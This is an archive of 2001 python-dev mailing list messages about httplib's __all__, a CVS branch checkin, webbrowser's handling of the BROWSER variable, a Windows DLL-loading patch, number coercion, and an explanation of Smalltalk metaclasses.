would break a huge amount of code. For example: for i in r: ... if whatever: break print i Besides, the semantic mismatch created between a listcomp and a for-loop pales in comparison to the mismatch that currently exists between the behavior of listcomps and all of the other operators. Of course, that's just my opinion--I could be wrong. > Then we won't have to go > into hiding until Guido dies or lifts the fatwah against us. fatwah? Uh... should I start talking to the witness protection program folks? Cheers, Dave From skip@pobox.com (Skip Montanaro) Thu May 31 19:02:51 2001 From: skip@pobox.com (Skip Montanaro) (Skip Montanaro) Date: Thu, 31 May 2001 13:02:51 -0500 Subject: [Python-Dev] Re: 2.1 strangness In-Reply-To: References: Message-ID: <15126.34635.67975.31473@beluga.mojam.com> >>>>> "Robin" == Robin Becker writes: Robin> from httplib import * Robin> class Bongo(HTTPConnection): Robin> pass ... Robin> NameError: name 'HTTPConnection' is not defined It was a brain fart on my part when creating httplib.__all__. HTTPConnection was not included in that list. I will check in a fix. In the 2.1 release __all__ was defined as __all__ = ["HTTP"] I have changed that to __all__ = ["HTTP", "HTTPResponse", "HTTPConnection", "HTTPSConnection", "HTTPException", "NotConnected", "UnknownProtocol", "UnknownTransferEncoding", "IllegalKeywordArgument", "UnimplementedFileMode", "IncompleteRead", "ImproperConnectionState", "CannotSendRequest", "CannotSendHeader", "ResponseNotReady", "BadStatusLine", "error"] and will check the change into CVS shortly. (Thomas, keep an eye open for this as an addition to 2.1.1.) The workaround I would choose is to not use from "httplib import *": import httplib class Bongo(httplib.HTTPConnection): pass Robin> Changing the * to HTTPConnection in ttt.py removes the problem. Yup, that will also work. Before anyone asks, "Who died and make Skip King?", the scenario as I recall it was that the semantics of __all__ got settled on during discussions on python-dev (the goal of __all__ being to minimize namespace pollution by "from ... *"), but nobody stepped up immediately to do the gtunt work, so I volunteered. The problem in relying on one person (well, at least this one person) to do this was that I had only the following tools at my disposal to decide what belonged in __all__: * what was documented in the lib reference manual (which was at times incomplete) * my experience with the various modules (some of which was specialized, some of which was nonexistent) * the standard library (which generally doesn't use "from ... *" much) * input from python-dev (whose members also appear not to use "from ... *" very liberally) In retrospect, I probably should have polled c.l.py with a summary of what I came up with before the 2.1 ship date. If people would like me to do that now (before 2.2 gets anywhere close to release) to try and fill in as many missing symbols as possible, let me know. -- Skip Montanaro (skip@pobox.com) (847)971-7098 From skip@pobox.com (Skip Montanaro) Thu May 31 19:06:01 2001 From: skip@pobox.com (Skip Montanaro) (Skip Montanaro) Date: Thu, 31 May 2001 13:06:01 -0500 Subject: [Python-Dev] Damn... I think I might have just muffed a checkin Message-ID: <15126.34825.167026.520535@beluga.mojam.com> I just updated httplib.py to expand the list of names in its __all__ list. I was operating on version 1.34. After the checkin I am looking at version 1.34.2.1. I see that Lib/CVS/Tag exists in my directory tree and says "release21-maint". Did I muff it? If so, how should I do an unmuff operation? Skip From robin@jessikat.fsnet.co.uk Thu May 31 19:33:02 2001 From: robin@jessikat.fsnet.co.uk (Robin Becker) Date: Thu, 31 May 2001 19:33:02 +0100 Subject: [Python-Dev] Re: 2.1 strangness In-Reply-To: <15126.34635.67975.31473@beluga.mojam.com> References: <15126.34635.67975.31473@beluga.mojam.com> Message-ID: In message <15126.34635.67975.31473@beluga.mojam.com>, Skip Montanaro writes >>>>>> "Robin" == Robin Becker writes: > > Robin> from httplib import * > > Robin> class Bongo(HTTPConnection): > Robin> pass > ... > Robin> NameError: name 'HTTPConnection' is not defined > >It was a brain fart on my part when creating httplib.__all__. >HTTPConnection was not included in that list. I will check in a fix. >In the 2.1 release __all__ was defined as > > __all__ = ["HTTP"] > >I have changed that to > > __all__ = ["HTTP", "HTTPResponse", "HTTPConnection", "HTTPSConnection", > "HTTPException", "NotConnected", "UnknownProtocol", > "UnknownTransferEncoding", "IllegalKeywordArgument", > "UnimplementedFileMode", "IncompleteRead", > "ImproperConnectionState", "CannotSendRequest", >"CannotSendHeader", > "ResponseNotReady", "BadStatusLine", "error"] thanks; I'm still a bit puzzled as to the exact semantics. It just looks wrong. Is __all__ the only way to get things into the * version of import? Presumably HTTPConnection is being marked as a potential global in the compile phase. -- Robin Becker From skip@pobox.com (Skip Montanaro) Thu May 31 20:27:12 2001 From: skip@pobox.com (Skip Montanaro) (Skip Montanaro) Date: Thu, 31 May 2001 14:27:12 -0500 Subject: [Python-Dev] Re: 2.1 strangness In-Reply-To: References: <15126.34635.67975.31473@beluga.mojam.com> Message-ID: <15126.39696.370516.926735@beluga.mojam.com> Robin> thanks; I'm still a bit puzzled as to the exact semantics. It Robin> just looks wrong. Is __all__ the only way to get things into the Robin> * version of import? Essentially, yes. If you want to just dispense with it __all__together (=:-o), you can textually replace __all__ with ___all__ in each of the standard library modules: cd /usr/local/lib/python2.1 for f in *.py ; do sed -e 's/___*all__/___all__/g' < $f > $f.tmp mv $f.tmp $f done Note that I didn't touch any files in directories under the basic Lib directory. Robin> Presumably HTTPConnection is being marked as a potential global Robin> in the compile phase. It has nothing to do with module compilation. The contents of __all__ are a static thing in the text of the .py file, and thusfar almost entirely due to me studying the inputs at hand and making a decision about what belonged and what didn't. Some python-dev people caught ommissions and added them before the 2.1 release. Other than that, the mistakes are all mine. I had some misgivings about the whole thing during the midst of the task and still do, but grumbled once and completed it. Skip From skip@pobox.com (Skip Montanaro) Thu May 31 20:57:21 2001 From: skip@pobox.com (Skip Montanaro) (Skip Montanaro) Date: Thu, 31 May 2001 14:57:21 -0500 Subject: [Python-Dev] weird webbrowser behavior Message-ID: <15126.41505.987887.477670@beluga.mojam.com> I'm using Gnome under Mandrake 8.0 and getting very strange results using webbrowser (indirectly via pydoc). Apparently, Gnome's init code sets the BROWSER environment variable to "nautilus" (much to my surprise) and webbrowser trusts it as the god's honest truth, even though nautilus has not been registered with the webbrowser module (am I supposed to add that sort of stuff to site.py?). Accordingly, _tryorder is ['nautilus'] but doesn't appear in _browser.keys() is ['lynx', 'links', 'netscape', 'kfm', 'mozilla']. I think webbrowser should either ignore elements of BROWSER if they have not previously been registered (and can't be found by _iscommand) or try to register them using GenericBrowser. Users are apparently not the only people setting BROWSER, so the comment in the code: # It's the user's responsibility to register handlers for any unknown # browser referenced by this value, before calling open(). seems like flawed logic to me. Skip From esr@thyrsus.com Thu May 31 21:08:21 2001 From: esr@thyrsus.com (Eric S. Raymond) Date: Thu, 31 May 2001 16:08:21 -0400 Subject: [Python-Dev] weird webbrowser behavior In-Reply-To: <15126.41505.987887.477670@beluga.mojam.com>; from skip@pobox.com on Thu, May 31, 2001 at 02:57:21PM -0500 References: <15126.41505.987887.477670@beluga.mojam.com> Message-ID: <20010531160821.A10314@thyrsus.com> Skip Montanaro : > I think webbrowser should either ignore elements of BROWSER if > they have not previously been registered (and can't be found by _iscommand) > or try to register them using GenericBrowser. Users are apparently not the > only people setting BROWSER, so the comment in the code: Fred Drake and I are co-responsible for that code. If you want to patch it to do this, I won't object. -- Eric S. Raymond "They that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety." -- Benjamin Franklin, Historical Review of Pennsylvania, 1759. From fdrake@acm.org Thu May 31 21:18:26 2001 From: fdrake@acm.org (Fred L. Drake, Jr.) Date: Thu, 31 May 2001 16:18:26 -0400 (EDT) Subject: [Python-Dev] Damn... I think I might have just muffed a checkin In-Reply-To: <15126.34825.167026.520535@beluga.mojam.com> References: <15126.34825.167026.520535@beluga.mojam.com> Message-ID: <15126.42770.17954.452663@cj42289-a.reston1.va.home.com> Skip Montanaro writes: > I just updated httplib.py to expand the list of names in its __all__ list. > I was operating on version 1.34. After the checkin I am looking at version > 1.34.2.1. I see that Lib/CVS/Tag exists in my directory tree and says > "release21-maint". Did I muff it? If so, how should I do an unmuff > operation? If that's really a muff, revert the change: cd .../Lib/ cvs diff -r1.34.2.1 -r1.34 httplib.py | patch and commit the new version as 1.34.2.2: cvs commit -m 'unmuff...' httplib.py -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From skip@pobox.com (Skip Montanaro) Thu May 31 21:30:22 2001 From: skip@pobox.com (Skip Montanaro) (Skip Montanaro) Date: Thu, 31 May 2001 15:30:22 -0500 Subject: [Python-Dev] weird webbrowser behavior In-Reply-To: <20010531160821.A10314@thyrsus.com> References: <15126.41505.987887.477670@beluga.mojam.com> <20010531160821.A10314@thyrsus.com> Message-ID: <15126.43486.320228.376505@beluga.mojam.com> Eric> Fred Drake and I are co-responsible for that code. If you want to Eric> patch it to do this, I won't object. Here's a first pass that seems to work for me: https://sourceforge.net/tracker/index.php?func=detail&aid=429136&group_id=5470&atid=305470 though it doesn't attempt to recover if _tryorder winds up empty. Skip From skip@pobox.com (Skip Montanaro) Thu May 31 21:48:40 2001 From: skip@pobox.com (Skip Montanaro) (Skip Montanaro) Date: Thu, 31 May 2001 15:48:40 -0500 Subject: [Python-Dev] Damn... I think I might have just muffed a checkin In-Reply-To: <15126.42770.17954.452663@cj42289-a.reston1.va.home.com> References: <15126.34825.167026.520535@beluga.mojam.com> <15126.42770.17954.452663@cj42289-a.reston1.va.home.com> Message-ID: <15126.44584.300357.360209@beluga.mojam.com> >> I just updated httplib.py to expand the list of names in its __all__ >> list. I was operating on version 1.34. After the checkin I am >> looking at version 1.34.2.1. I see that Lib/CVS/Tag exists in my >> directory tree and says "release21-maint". Did I muff it? If so, >> how should I do an unmuff operation? Fred> If that's really a muff, revert the change: Fred> cd .../Lib/ Fred> cvs diff -r1.34.2.1 -r1.34 httplib.py | patch Fred> and commit the new version as 1.34.2.2: Fred> cvs commit -m 'unmuff...' httplib.py Functionally, the checkin isn't a muff (it does have the change I intended), but I was worried about the version number. Should I have checked it in as version 1.34.2.1 or 1.35? Skip From fdrake@acm.org Thu May 31 22:00:34 2001 From: fdrake@acm.org (Fred L. Drake, Jr.) Date: Thu, 31 May 2001 17:00:34 -0400 (EDT) Subject: [Python-Dev] weird webbrowser behavior In-Reply-To: <15126.41505.987887.477670@beluga.mojam.com> References: <15126.41505.987887.477670@beluga.mojam.com> <20010531160821.A10314@thyrsus.com> Message-ID: <15126.45298.666556.20710@cj42289-a.reston1.va.home.com> Skip Montanaro writes: > or try to register them using GenericBrowser. Users are apparently not the > only people setting BROWSER, so the comment in the code: > > # It's the user's responsibility to register handlers for any unknown > # browser referenced by this value, before calling open(). > > seems like flawed logic to me. Eric S. Raymond writes: > Fred Drake and I are co-responsible for that code. If you want to patch it > to do this, I won't object. I wouldn't object either. I *do* object to the system setting that variable by default by either Mandrake or Gnome -- that's just stupid and inconsiderate of the user. Now, if anyone can provide support for Nautilis, I won't object to that either. Unfortunately, Mandrake's installer stinks at upgrading (it couldn't seem to locate my 7.2 installation) and I don't have the time to figure that out. -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From fdrake@acm.org Thu May 31 22:04:30 2001 From: fdrake@acm.org (Fred L. Drake, Jr.) Date: Thu, 31 May 2001 17:04:30 -0400 (EDT) Subject: [Python-Dev] Damn... I think I might have just muffed a checkin In-Reply-To: <15126.44584.300357.360209@beluga.mojam.com> References: <15126.34825.167026.520535@beluga.mojam.com> <15126.42770.17954.452663@cj42289-a.reston1.va.home.com> <15126.44584.300357.360209@beluga.mojam.com> Message-ID: <15126.45534.417066.445852@cj42289-a.reston1.va.home.com> Skip Montanaro writes: > Functionally, the checkin isn't a muff (it does have the change I intended), > but I was worried about the version number. Should I have checked it in as > version 1.34.2.1 or 1.35? If the change should happen on the branch, leave it in. If it's also needed on the HEAD, check it in again there, and you're done. -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From m.favas@per.dem.csiro.au Thu May 31 23:41:13 2001 From: m.favas@per.dem.csiro.au (Mark Favas) Date: Fri, 01 Jun 2001 06:41:13 +0800 Subject: [Python-Dev] One more dict trick Message-ID: <3B16C889.C01905BD@per.dem.csiro.au> Tried the patch (thanks, Tim!) - but I guess the things I'm running aren't too sensitive to dict speed . I see a slight speed-up, around 1-2%... Nice, elegant patch that should go places! Maybe the bio-informatics people on c.l.py (Andrew Dalke?) would be interested in trying it out? -- Mark Favas - m.favas@per.dem.csiro.au CSIRO, Private Bag No 5, Wembley, Western Australia 6913, AUSTRALIA From MarkH at ActiveState.com Tue May 1 02:42:19 2001 From: MarkH at ActiveState.com (Mark Hammond) Date: Tue, 1 May 2001 10:42:19 +1000 Subject: [Python-Dev] Importing extensions on Windows 95 In-Reply-To: <3AED7248.B7386B83@lemburg.com> Message-ID: > Here's a stab at a patch. Could you review it and test it ? I > don't have enough knowledge of win32 for this... I think we can drop the getcwd call here completely. I prefer the patch below. Mark. Index: dynload_win.c =================================================================== RCS file: /cvsroot/python/python/dist/src/Python/dynload_win.c,v retrieving revision 2.7 diff -u -r2.7 dynload_win.c --- dynload_win.c 2000/10/05 10:54:45 2.7 +++ dynload_win.c 2001/05/01 00:36:40 @@ -163,24 +163,21 @@ #ifdef MS_WIN32 { - HINSTANCE hDLL; + HINSTANCE hDLL = NULL; char pathbuf[260]; - if (strchr(pathname, '\\') == NULL && - strchr(pathname, '/') == NULL) - { - /* Prefix bare filename with ".\" */ - char *p = pathbuf; - *p = '\0'; - _getcwd(pathbuf, sizeof pathbuf); - if (*p != '\0' && p[1] == ':') - p += 2; - sprintf(p, ".\\%-.255s", pathname); - pathname = pathbuf; - } - /* Look for dependent DLLs in directory of pathname first */ - /* XXX This call doesn't exist in Windows CE */ - hDLL = LoadLibraryEx(pathname, NULL, - LOAD_WITH_ALTERED_SEARCH_PATH); + LPTSTR dummy; + /* We use LoadLibraryEx so Windows looks for dependent DLLs + in directory of pathname first. However, Windows95 + can sometimes not work correctly unless the absolute + path is used. If GetFullPathName() fails, the LoadLibrary + will certainly fail too, so use its error code */ + if (GetFullPathName(pathname, + sizeof(pathbuf), + pathbuf, + &dummy)) + /* XXX This call doesn't exist in Windows CE */ + hDLL = LoadLibraryEx(pathname, NULL, + LOAD_WITH_ALTERED_SEARCH_PATH); if (hDLL==NULL){ char errBuf[256]; unsigned int errorCode; From thomas at xs4all.net Tue May 1 10:07:48 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Tue, 1 May 2001 10:07:48 +0200 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Python bltinmodule.c,2.198,2.199 In-Reply-To: ; from tim_one@users.sourceforge.net on Sat, Apr 28, 2001 at 01:20:24AM -0700 References: Message-ID: <20010501100748.M16486@xs4all.nl> On Sat, Apr 28, 2001 at 01:20:24AM -0700, Tim Peters wrote: > Update of /cvsroot/python/python/dist/src/Python > In directory usw-pr-cvs1:/tmp/cvs-serv4629/python/dist/src/Python > > Modified Files: > bltinmodule.c > Log Message: > Fix buglet reported on c.l.py: map(fnc, file.xreadlines()) blows up. > Also a 2.1 bugfix candidate (am I supposed to do something with those?). No, not really. You can do me a favor by writing halfway decent checkin messages (no complaints there) and keep your fingers off the 'fix whitespace' button :) I keep a close eye on the checkins as they happen, and save away those that might need to be checked into the 2.1.1 branch. I'll go over them with a fine tooth comb when I'm approaching critical release mass :) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From mal at lemburg.com Tue May 1 12:30:57 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Tue, 01 May 2001 12:30:57 +0200 Subject: [Python-Dev] Importing extensions on Windows 95 References: Message-ID: <3AEE9061.32239814@lemburg.com> Mark Hammond wrote: > > > Here's a stab at a patch. Could you review it and test it ? I > > don't have enough knowledge of win32 for this... > > I think we can drop the getcwd call here completely. > > I prefer the patch below. If this works as expected, please check in the patch. (Note that I have not tested the patch I posted -- I've never used VC++ for anything else than compiling C extensions and GMP.) > Mark. > > Index: dynload_win.c > =================================================================== > RCS file: /cvsroot/python/python/dist/src/Python/dynload_win.c,v > retrieving revision 2.7 > diff -u -r2.7 dynload_win.c > --- dynload_win.c 2000/10/05 10:54:45 2.7 > +++ dynload_win.c 2001/05/01 00:36:40 > @@ -163,24 +163,21 @@ > > #ifdef MS_WIN32 > { > - HINSTANCE hDLL; > + HINSTANCE hDLL = NULL; > char pathbuf[260]; > - if (strchr(pathname, '\\') == NULL && > - strchr(pathname, '/') == NULL) > - { > - /* Prefix bare filename with ".\" */ > - char *p = pathbuf; > - *p = '\0'; > - _getcwd(pathbuf, sizeof pathbuf); > - if (*p != '\0' && p[1] == ':') > - p += 2; > - sprintf(p, ".\\%-.255s", pathname); > - pathname = pathbuf; > - } > - /* Look for dependent DLLs in directory of pathname first */ > - /* XXX This call doesn't exist in Windows CE */ > - hDLL = LoadLibraryEx(pathname, NULL, > - LOAD_WITH_ALTERED_SEARCH_PATH); > + LPTSTR dummy; > + /* We use LoadLibraryEx so Windows looks for dependent DLLs > + in directory of pathname first. However, Windows95 > + can sometimes not work correctly unless the absolute > + path is used. If GetFullPathName() fails, the LoadLibrary > + will certainly fail too, so use its error code */ > + if (GetFullPathName(pathname, > + sizeof(pathbuf), > + pathbuf, > + &dummy)) > + /* XXX This call doesn't exist in Windows CE */ > + hDLL = LoadLibraryEx(pathname, NULL, > + LOAD_WITH_ALTERED_SEARCH_PATH); > if (hDLL==NULL){ > char errBuf[256]; > unsigned int errorCode; -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Tue May 1 23:22:11 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Tue, 01 May 2001 23:22:11 +0200 Subject: [Python-Dev] Coercion and comparison of numbers Message-ID: <3AEF2903.79308F55@lemburg.com> I just received a bug report for mx.Number which revealed a probelm with the comparison code in Python 2.1. Looking at the code it seems that one of my original coercion patches did not make it into the core. I added a new API PyNumber_Compare() knows about the new coercion mechanism and should be called for numbers instead of trying coercion in PyObject_Compare(). Was this part of the coercion patch left out on purpose or a simple oversight ? I hope the latter... -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From jack at oratrix.nl Tue May 1 23:23:59 2001 From: jack at oratrix.nl (Jack Jansen) Date: Tue, 1 May 2001 23:23:59 +0200 (MET DST) Subject: [Python-Dev] MacPython 2.1 released Message-ID: <20010501212359.792FADDDF0@oratrix.oratrix.nl> MacPython 2.1 is available for download. Get it via http://www.cwi.nl/~jack/macpython.html . Python is a high-level programming language that is suitable for simple scripting tasks as well as writing large applications. MacPython offers alot of Mac-specific extensions, including access to all major MacOS Toolbox modules (QuickDraw, QuickTime, AppleScript and many more), an Integrated Development Environment (in Python!), frameworks for windowing applications, unix-compatible cgi-scripting, image-manipulation libraries, numerical libraries, tk-based machine independent windowing and lots more. It also uniquely among Pythons allows you to create fully selfcontained (and, hence, distributable) applications without needing a C compiler or anything. New in this version: - A choice of Carbon or Classic runtime, so runs on anything between MacOS 8.1 and MacOS X - Distutils support for easy installation of extension packages - BBedit language plugin - All the platform-independent Python 2.1 mods - New version of Numeric - Lots of bug fixes - Choice of normal and active installer Please send feedback on this release to pythonmac-sig at python.org, where all the MacPythoneers hang out. Enjoy, -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | ++++ see http://www.xs4all.nl/~tank/ ++++ From guido at digicool.com Wed May 2 02:52:29 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 01 May 2001 19:52:29 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk Message-ID: <200105020052.TAA24315@cj20424-a.reston1.va.home.com> Jim Althoff (a big commercial user of J[P]ython) sent me a summary of how metaclasses work in Smalltalk. He should know, since he invented them! :-) I include it below, with his permission. While implementing more class-like behavior for built-in types in the experimental descr-branch in the 2.2 CVS tree, I've noticed problems caused by Python's collapsing of class attributes and instance attributes. For example, suppose d is a dictionary. My experimental changes make d.__class__ return DictType (from the types module). (DictType.__class__ is TypeType, by the way.) I also added special methods. For example, d.__repr__() now returns repr(d). I am preparing for subclassing of built-in types, so I will eventually be able to derive a class MyDictType from DictType, as follows: class MyDictType(DictType): ... Now comes the fun part. Suppose MyDictType wants to define its own repr(): class MyDictType(DictType): def __repr__(self): return "MyDictType(%s)" % DictType.__repr__(self) But, (surprise, surprise!), DictType itself also has a __repr__() method: it returns the string "". So the above code would fail: DictType.__repr__() returns repr(DictType), and DictType.__repr__(self) raises an argument count error. The correct __repr__ method for dictionary objects can be found as DictType.__dict__['__repr__'], but that looks hideous! What to do? Pragmatically, I can make DictType.__repr__ return DictType.__dict__['__repr__'], and all will be well in this example. But we have to tread carefully here: DictType.__class__ is TypeType, but DictType.__dict__['__class__'] is a descriptor for the __class__ attribute on dictionary objects. The best rule I can think of so far is that DictType.__dict__ gives the *true* set of attribute descriptors for dictionary objects, and is thus similar to Smalltalks's class.methodDict that Jim describes below. DictType.foo is a shortcut that can resolve to either DictType.__dict__['foo'] or to an attribute (maybe a method) of DictType described in TypeType.__dict__['foo'], whichever is defined. If both are defined, I propose the following, clumsy but backwards compatible rule: if DictType.__dict__['foo'] describes a method, it wins. Otherwise, TypeType.__dict__['foo'] wins. Sigh. --Guido van Rossum (home page: http://www.python.org/~guido/) ------------------------- Jim Althoff's message --------------------------- Hi Guido, I was reading the discussion on class methods in the python-dev archive and noticed your question about how Smalltalk determines the difference between instance methods and class methods. I have some info on this which I can't post to python-dev, not being a member; but I thought you might be interested in it anyway. It turns out that I am the one that devised metaclasses in Smalltalk-80. (On the other hand, I haven't looked at any Smalltalk implementation code in a long time so this is merely a description of how it all started.) Basically (I think) Smalltalk doesn't have the ambiguity you mention for instance methods versus class methods (as Python would) because Smalltalk doesn't do method lookup the same as Python does. To illustrate, suppose you have object.method() (using Python-style syntax) The Smalltalk method lookup is as follows: o find the class that object is an instance of -- this resulting thing is a "class object" (a first-class object, same as in Python) o since class is a "class object" one of its fields will be a dict of methods -- let's call it class.methodDict o find method in class.methodDict o if found, execute method on object o if not, do the same thing traversing the (single inheritance) superclass chain (follow class.superClass) I believe Python works roughly as follows (Just testing my own understanding here -- correct me if I don't get it right): o convert (conceptually at least) object.method() into object. __class__.method(object) o find a _function_ corresponding to method in object.__class__.__dict__ o if found, execute the found function (with object bound as the first arg to function) o if not, traverse the (multiple inheritance) superclass chain (depth first) I think the key difference is that Python treats object.method() the same as it treats object.__class__.method(object). Smalltalk doesn't do this. In Smalltalk, object.__class__.method(object) would mean: o consider object.__class__ to be an "object" like any other "object" in Smalltalk (which it is) o get the "class object" of object.__class__ , namely object. __class__.class__ o find method in object.__class__.__class__.methodDict o if found, execute the method on object.__class__ o if not, do the same thing traversing the (single inheritance) superclass chain (follow object.__class__.__class__.superClass) In other words, it exactly the same lookup mechanism. So there is no ambiguity. To summarize, in Smalltalk: o instance methods (for instances that are not "class objects") are specified by: instance.instanceMethod() o class methods are specified by: class.classMethod() o both of these are just object.objectMethod() since classes are objects and the method lookup mechanism is no different from that of any other kind of object. A concrete example: If I have a class Date in Smalltalk and an instance of it referenced by variable, d. I would do: o d.followingDate() for an instance method, and o Date.currentDate() for a class method I think this is a nice, conceptually simple model. Things get interesting, though, when you start to consider how the mechanism of class. __class__ -- which is the thing that makes class methods no different than instance methods -- actually works. And this leads to metaclasses in Smalltalk. Here's a rough sketch of how metaclasses work: Standard principles of Smalltalk: o everything is an object (first-class) o every object is an instance of a class o a class inherits (single-inheritance) from its superclass (except the root class Object, which has no superclass) o methods can be invoked on a object. All such methods are defined as part of the object's class definition (or a class going up the superclass chain) Because of the first 2 principles above: o every class is an object (because everything is an object) o every class is, itself, an instance of some class (because every object is an instance of a class) Originally in Smalltalk-76, there was one metaclass, Class. All classes (class objects) were instances of Class. Class was an instance of itself. Class had methods defined for it just like all classes did. In particular, it had a method "new" -- this being the method that creates instances of classes. So suppose you had class Rectangle. Rectangle is an instance of Class (hence it is a class object). If you wanted to create an instance of Rectangle, you would do: myRect = Rectangle.new(). This would mean: "find the 'new' method in the definition of Rectangle's class (Class) and invoke it on Rectangle (which is a class object). The result is a Rectangle instance which is assigned to the variable myRect. The Rectangle class object held data (state -- same rules as any other kind of object) -- such as number and name of fields its instances would have, a dictionary of methods for its instances, etc. So the "new" method in Class would have access to all the info it needed to create a Rectangle instance (as opposed to a Point instance, for example). The limitation with this scheme was that all classes had to share exactly the same methods, namely all the methods defined in Class. The method "new" was one of these methods along with lots of "reflection-type" methods for class creation, modification, and inspection. But if you wanted an "application-oriented" class method -- like Date.currentDate() -- you couldn't do that because then the method "currentDate" would be shared amongst all class objects (instances of Class) and wouldn't make any sense (e.g., Rectangle.currentDate()). In Smalltalk-80 I added a more flexible mechanism which we called metaclasses (we hadn't used that terminology previously for the single Class although it was a "metaclass"). The thing that everyone in the Smalltalk development team liked about the new metaclass mechanism at the time was that it didn't require any new basic principles for Smalltalk. It was all done using the same basic principles of Smalltalk listed above. The idea was to use subclassing to allow for different methods for different instances of Class. A "metaclass" simply became a subclass of Class. Each class object then ended up being a singleton instance (although the "singleton-ness" was not mandatory) of a metaclass (i.e., a subclass of Class). So class objects were no longer _all_ instances of the _same_ class (Class). Each was an instance of a corresponding subclass of Class -- that is to say, an instance of a metaclass. The Smalltalk-80 class hierarchy looked like the following: (This is actually a simplification. The actually hierarchy has a little more factoring and I changed the names for more clarity). First a digression on some terminology: o a class is an object that can be instantiated o a metaclass is a class and one such that when it is instantiated, the instanced is itself a class o a plain-object is one that cannot be instantiated (I'm just making this term up). o a plain-class is one that is a class but is not a metaclass (making this up, too). In the list below, indentation indicates class hieararchy (superclass -- subclass) plain-class ---------------- o Class o Object isInstanceOf o ObjectMetaClass isInstanceOf MetaClass o Class isInstanceOf o ClassMetaClass isInstanceOf MetaClass o MetaClass isInstanceOf o MetaClassMetaClass isInstanceOf MetaClass . . . o Rectangle isInstanceOf o RectangleMetaClass isInstanceOf MetaClass o SpecializedRectangle isInstanceOf o SpecializedRectangleMetaClass isInstanceOf MetaClass All "metaclasses" are instances of MetaClass. All "plain-classes" (those that are not "metaclasses") are instances of a "metaclass". Because of this there are parallel class hierarchies between "plain-classes" and their corresponding "metaclasses". Note that MetaClass is a "plain-class" and not a "metaclass". Also note that MetaClass (being a "plain-class") is an instance of its corresponding "metaclass" MetaClassMetaClass. And MetaClassMetaClass is an instance of MetaClass (because MetaClassMetaClass _is_ a "metaclass"). The MetaClass / MetaClassMetaClass class/instance relationship is circular. An example. If you want a Rectangle class you first make a metaclass for it, RectangleMetaClass -- actually, the system does this for you automatically as part of the class creation method implementation (when you define the class Rectangle, for example). RectangleMetaClass is an instance of MetaClass so all the methods defined in MetaClass are available to it. RectangleMetaClass can also define its own methods now (because it is a class) which would be invoked on any (typically one) instance of RectangleMetaClass, which in this case is going to be class Rectangle. You then make your Rectangle class by making an instance of RectangleMetaClass (conceptually doing: Rectangle = RectangleMetaClass.new() ). Now you can make instances of Rectangle, doing: myRect = Rectangle.new() as before. This is not so different from the Smalltalk-76 mechanism. The main advantage is that you now have a specific class, RectangleMetaClass, that can have methods specific to the class Rectangle (the instance of RectangleMetaClass). So you could define a method like "newFromPointToPoint" for example and then do: myRect = Rectangle.newFromPointToPoint(point1,point2). The meaning is the same as always: take the variable "Rectangle", find out what it is pointing to. It is pointing to an instance of the RectangleMetaClass. Find the method "newFromPointToPoint" as part of the definition of RectangleMetaClass (it being a class object). Invoke this method on the Rectangle class object -- which then creates a Rectangle instance. The same would go for the other example: Date.currentDate(). So the bottom line is (I think) that the Smalltalk method lookup mechanism doesn't have to resolve an ambiguity because all methods that get invoked on an object always come from the object's definition class (or superclass) and from no other place. Hope this helps, Jim From guido at digicool.com Wed May 2 03:29:28 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 01 May 2001 20:29:28 -0500 Subject: [Python-Dev] Coercion and comparison of numbers In-Reply-To: Your message of "Tue, 01 May 2001 23:22:11 +0200." <3AEF2903.79308F55@lemburg.com> References: <3AEF2903.79308F55@lemburg.com> Message-ID: <200105020129.UAA24690@cj20424-a.reston1.va.home.com> > I just received a bug report for mx.Number which revealed a > probelm with the comparison code in Python 2.1. Looking at > the code it seems that one of my original coercion patches > did not make it into the core. I added a new API PyNumber_Compare() > knows about the new coercion mechanism and should be called for > numbers instead of trying coercion in PyObject_Compare(). > > Was this part of the coercion patch left out on purpose or > a simple oversight ? I hope the latter... Hard to say. I don't think I paid very close attention to your patch; Neil did, but I changed a lot of the code around coercions and comparisons in order to implement rich comparisons. So, several things may have happened: Neil lost it; Neil decided against it; or I ripped it out. Can you elucidate me regarding the issues? (If there's code, please quote it or link to a specific patch.) Since the concept of "number" is ill-defined at best, when exactly should PyNumber_Compare() be called? What is it supposed to do? Does it need a rich cousin? --Guido van Rossum (home page: http://www.python.org/~guido/) From nas at python.ca Wed May 2 02:42:15 2001 From: nas at python.ca (Neil Schemenauer) Date: Tue, 1 May 2001 17:42:15 -0700 Subject: [Python-Dev] Coercion and comparison of numbers In-Reply-To: <200105020129.UAA24690@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Tue, May 01, 2001 at 08:29:28PM -0500 References: <3AEF2903.79308F55@lemburg.com> <200105020129.UAA24690@cj20424-a.reston1.va.home.com> Message-ID: <20010501174215.A9565@glacier.fnational.com> [MAL] > I just received a bug report for mx.Number which revealed a > probelm with the comparison code in Python 2.1. Looking at > the code it seems that one of my original coercion patches > did not make it into the core. I added a new API PyNumber_Compare() > knows about the new coercion mechanism and should be called for > numbers instead of trying coercion in PyObject_Compare(). I remember the API. I don't remember what happened to it. Guido might have dropped it or I might have taken it out thinking the comparison issues would be sorted out by Guido. Why is a new API needed? Why can't PyObject_Compare() do the right thing (ie. not coerce new style numbers)? Neil From guido at digicool.com Wed May 2 03:55:59 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 01 May 2001 20:55:59 -0500 Subject: [Python-Dev] Slight wart in __all__ In-Reply-To: Your message of "Sun, 29 Apr 2001 12:14:43 +1000." References: Message-ID: 